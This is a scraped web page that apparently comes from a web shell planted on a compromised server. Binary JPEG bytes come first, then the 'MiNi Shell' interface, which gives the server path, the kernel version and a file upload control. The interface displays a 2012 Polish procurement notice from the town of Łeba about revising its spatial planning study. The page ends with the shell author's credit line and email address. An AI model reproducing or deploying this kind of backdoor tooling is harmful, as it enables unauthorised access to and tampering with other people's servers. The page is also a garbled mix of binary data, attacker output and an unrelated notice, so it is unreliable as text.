JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/355930-N-2012.html

<p class="kh_header"><b>Łeba: Wykonanie opracowania pod nazwą Zmiana studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Łeby</b><br>
<b>Numer ogłoszenia: 355930 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Łeba , ul. Kościuszki 90, 84-360 Łeba, woj. pomorskie, tel. 059 8661513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lebabip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowania pod nazwą Zmiana studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Łeby.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie zmiany Studium obejmuje cały obszar Gminy Miejskiej Łeby,           granicami obszaru objętego zmianą Studium są granice administracyjne Gminy Miejskiej Łeby, powierzchnia Gminy Miejskiej Łeba wynosi 1.480,96 ha. Przedmiot zamówienia obejmuje: sporządzenie projektu zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Łeby wraz z prognozą oddziaływania na środowisko oraz Gminną Ewidencją Zabytków zawierającego: dokumentację tekstową w formie załącznika do uchwały Rady Miejskiej w Łebie, obejmującą uwarunkowania, ustalenia określające kierunki zagospodarowania przestrzennego Gminy oraz uzasadnienie zawierające objaśnienia przyjętych rozwiązań. Opracowania graficzne, stanowiące załączniki do uchwały w skali 1:5000 obejmujące: uwarunkowania, ustalenia określające kierunki zagospodarowania przestrzennego Gminy oraz granice obszarów wskazanych w art.10 ust.2 ustawy o planowaniu i zagospodarowaniu przestrzennym  w formie papierowej, opracowanie w formie elektronicznej na płycie CD całości opracowania (część tekstowa i graficzna) w formatach umożliwiających przeglądanie i drukowanie przy użyciu ogólnodostępnego oprogramowania. Opracowanie zmiany Studium zgodnie z przepisami ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym, rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy i przepisami odrębnymi. Sporządzenie gminnej ewidencji zabytków zgodnie z wymogami zawartymi w  ustawie o ochronie zabytków i opiece nad zabytkami z dnia 23 lipca 2003r., ustawie o zmianie ustawy o ochronie zabytków i opiece nad zabytkami oraz o zmianie niektórych innych ustaw z dnia 18 marca 2010r. Wszystkie czynności należy wykonać zgodnie z standardami przewidzianymi przez Rozporządzenie Ministra Kultury i Dziedzictwa Narodowego z dnia 26 maja 2011r.
Sporządzenie prognozy oddziaływania ustaleń zmiany Studium na środowisko, zgodnie z przepisami ustawy z dnia 3.10.2008r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko wraz z analizą i propozycją rozpatrzenia uwag i wniosków oraz przygotowaniem projektów obwieszczeń, pism i zawiadomień w postępowaniu strategicznej oceny oddziaływania na środowisko. Przygotowanie wymaganych przepisami ustawy z dnia 27 marca 2003r o planowaniu i zagospodarowaniu przestrzennym, dotyczącymi procedury sporządzania studium projektów ogłoszeń, obwieszczeń i zawiadomień w tym o przystąpieniu do zmiany Studium, skompletowanie niezbędnych podkładów mapowych dla potrzeb opracowań w zakresie przedmiotu zamówienia, uczestniczenie w sesjach Rady Miejskiej w Łebie, na których podejmowane będą uchwały dotyczące zmiany Studium, w posiedzeniach Komisji Rady Miejskiej, Gminnej Komisji Urbanistyczno Architektonicznej oraz we wszystkich innych spotkaniach, niezbędnych do prawidłowego wykonania zamówienia do czasu dokonania przez Wojewodę oceny zgodności z przepisami prawnymi uchwały Rady Miejskiej w Łebie w sprawie uchwalenia zmiany Studium. Przygotowanie propozycji sposobu rozpatrzenia składanych wniosków dotyczących zmiany Studium. Na potrzeby sporządzenia Studium opracowanie inwentaryzacji urbanistycznej i ekofizjografii. Uzyskanie opinii i uzgodnień dotyczących projektu zmiany Studium od właściwych organów i instytucji wymaganych ustawą o planowaniu i zagospodarowaniu przestrzennym oraz w razie potrzeby wprowadzenie w związku z nimi odpowiednich poprawek w projekcie zmiany Studium. Przygotowanie i przekazanie projektu zmiany Studium do publicznego wglądu. Analizę uwag wniesionych do projektu zmiany Studium, w tym przedłożenie Burmistrzowi  propozycji sposobu ich rozpatrzenia. Przygotowanie i przekazanie projektu zmiany Studium wraz z propozycją sposobu rozpatrzenia uwag w formie umożliwiającej przedstawienie Radzie Miejskiej w Łebie do uchwalenia. Skompletowanie dokumentacji formalno prawnej prac planistycznych do projektu zmiany Studium do przedstawienia Wojewodzie w celu oceny zgodności z przepisami prawa.
Etapy opracowania przedmiotu zamówienia. Czynności formalno-prawne związane z przystąpieniem do opracowania przedmiotu umowy: analiza materiałów wyjściowych do opracowania, w tym obowiązującego Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Łeby, przygotowanie projektów ogłoszeń, obwieszczeń i zawiadomień instytucji i organów opiniujących i uzgadniających  o podjęciu uchwały o przystąpieniu do sporządzania Studium,  analiza i ocena zmian w zagospodarowaniu przestrzennym, skompletowanie niezbędnych podkładów mapowych w skali 1: 5000, opracowanie inwentaryzacji urbanistycznej, wykonanie opracowania ekofizjograficznego. Analiza i propozycja rozpatrzenie złożonych wniosków do zmiany Studium wraz z uzasadnieniem oraz  wykazem i rysunkiem przedstawiającym położenie i rozmieszczenie terenów, co do których zostały wniesione wnioski. Sporządzenie koncepcji projektu zmiany Studium oraz prezentacja opracowania Zamawiającemu, Radzie Miejskiej w Łebie. Uzyskanie pozytywnej opinii Rady Miejskiej dotyczącej koncepcji projektu zmiany Studium z uwzględnieniem ewentualnych uwag i wniosków.  Wykonanie Gminnej Ewidencji Zabytków, w ramach ewidencji należy wykonać karty obiektów istniejących i karty stanowisk archeologicznych ze wskazaniem obiektów na mapach. Sporządzenie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Łeby, spełniającego wymogi przepisów prawa, w wersji elektronicznej i papierowej, w ilości niezbędnej do dokonania uzgodnień i uzyskania opinii. Sporządzenie prognozy oddziaływania ustaleń Studium na środowisko. Analiza i opracowanie propozycji rozpatrzenia uwag i wniosków zgłoszonych w postępowaniu strategicznej oceny oddziaływania na środowisko, w związku z udziałem społeczeństwa na podstawie art.42 ust.2 i pisemne podsumowanie zawierające uzasadnienie wyboru przyjętego dokumentu sporządzone na podstawie art.55 ust.3 ustawy z dnia 3.10.2008r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko wraz z przygotowaniem projektów zawiadomień, obwieszczeń, pism dotyczących przeprowadzenia strategicznej oceny. Wdrożenie procedury uzgadniania i opiniowania projektu zmiany Studium wraz z przekazaniem dokumentu jw. do uzgodnień i opinii, przygotowanie projektów pism. Dokonanie analizy uzyskanych opinii i uzgodnień wraz ze sporządzeniem stosownego wykazu opinii oraz wprowadzenie zmian wynikających z uzyskanych opinii i dokonanych uzgodnień i ewentualne ponowne uzgodnienie i opiniowanie projektu zmiany Studium. Czynności związane z wyłożeniem projektu zmiany Studium do publicznego wglądu. Sporządzenie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Łeby do wyłożenia do publicznego wglądu, przekazanie opracowania Zamawiającemu, przygotowanie projektów ogłoszeń, obwieszczeń i zawiadomień o wyłożeniu projektu  Studium, udział w dyskusji publicznej wraz z przygotowaniem protokółu z dyskusji publicznej. Przeanalizowanie złożonych uwag do projektu zmiany Studium wraz z wykazem i przedstawieniem sposobu ich rozpatrzenia, wprowadzenie zmian do projektu Studium wynikających z uwzględnionych uwag z uzgodnieniem w niezbędnym zakresie. Przekazanie projektu zmiany Studium wraz z listą nieuwzględnionych uwag, spełniającego wymagania do podjęcia uchwały Rady Miejskiej w Łebie w sprawie uchwalenia zmiany Studium. Przygotowanie projektu uchwały Rady Miejskiej. Prezentacja projektu dokumentu na sesji Rady Miejskiej. Przygotowanie i skompletowanie dokumentacji planistycznej do przedstawienia Wojewodzie w celu oceny zgodności z prawem uchwały w sprawie uchwalenia zmiany Studium. Sporządzenie egzemplarzy uchwalonej zmiany Studium w formie papierowej (tekst i rysunek) w tym jeden rysunek  w formie umożliwiającej jego ekspozycję oraz w wersji elektronicznej na płycie CD. Sporządzenie dokumentacji prac planistycznych dot. czynności, o których mowa w art.11 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym wraz z wykazem dokumentów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności, związanych z realizacją przedmiotu zamówienia Zamawiający wymaga przedłożenia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie, Zamawiający żąda wykazu  wykonanych usług,  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich wartości, opisu przedmiotu wykonanej usługi, okresu realizacji zamówienia według wzoru stanowiącego załącznik numer 4 do Specyfikacji Istotnych Warunków Zamówienia. Dokumentu potwierdzającego, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia, Zamawiający wymaga złożenia wykazu osób wchodzących w skład zespołu projektowego, według wzoru stanowiącego załącznik numer 5 do Specyfikacji Istotnych Warunków Zamówienia. Zamawiający wymaga wykazania, że Wykonawca dysponuje co najmniej jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji do wykonywania prac planistycznych z zakresu zagospodarowania przestrzennego to jest należy do właściwej izby urbanistów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, Zamawiający wymaga złożenia wykazu osób wchodzących w skład zespołu projektowego, według wzoru stanowiącego załącznik numer 5 do Specyfikacji Istotnych Warunków Zamówienia. Zamawiający wymaga wykazania, że Wykonawca dysponuje co najmniej jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji do wykonywania prac planistycznych z zakresu zagospodarowania przestrzennego to jest należy do właściwej izby urbanistów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dodatkowych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści wybranej oferty, z zastrzeżeniem. Zmiana postanowień Umowy w zakresie sposobu bądź terminu realizacji Umowy może nastąpić w formie pisemnej pod rygorem nieważności w następujących przypadkach: zaistnienia okoliczności, obiektywnych, niezależnych od Stron, powodujących konieczność zmiany warunków realizacji prac przewidzianych w opisie przedmiotu zamówienia , gdy dalsza realizacja prac na dotychczasowych warunkach uniemożliwiałaby dotrzymanie przez Wykonawcę istotnych warunków i postanowień Umowy, a w szczególności wystąpienia: trudności związanych z pozyskaniem materiałów, opinii i uzgodnień, niezbędnych do wykonania przedmiotu umowy,  opóźnienia w realizacji umowy wynikających z przyczyn zewnętrznych, których nie dało się wcześniej przewidzieć, a które nie są wynikiem okoliczności zawinionych przez Zamawiającego lub Wykonawcę na przykład wynikających ze zmiany prawa lub obowiązujących norm wywołujących konieczność zmiany zakresu lub harmonogramu prac, konieczności wprowadzenia zmian rozszerzających zakres prac, które wynikną z decyzji jednostek uzgadniających, konieczności przeprowadzenia ponownej procedury, wynikającej z wprowadzenia zmian wnioskowanych na etapie wyłożenia do publicznego wglądu, konieczności przeprowadzenia ponownej procedury wynikającej ze względów formalnych, zaistnienie okoliczności uniemożliwiających terminową realizację umowy lub zaistnienia przerw w jej wykonaniu leżących po stronie Zamawiającego na przykład przyczyny organizacyjne, uzgodnienia z instytucjami zewnętrznymi, Komisjami Rady Miejskiej Łeby.  Termin wykonania przedmiotu zamówienia, w powyższych przypadkach ulega przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia prac. Zmiana terminu może ulec przesunięciu wyłącznie za zgodą Zamawiającego tylko o niezbędny czas ustalony indywidualnie, w zależności od przyczyny zwłoki, na pisemny wniosek Wykonawcy.  Jakiekolwiek zmiany umowy wymagają zgody obu stron oraz pod rygorem nieważności zachowania formy pisemnej w postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lebabip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łebie 84-360 Łeba ul. Kościuszki 90.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 10:00, miejsce: Urząd Miejski w Łebie, 84-360 Łeba ul Kościuszki 90 pokój Nr 11, sekretariat, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com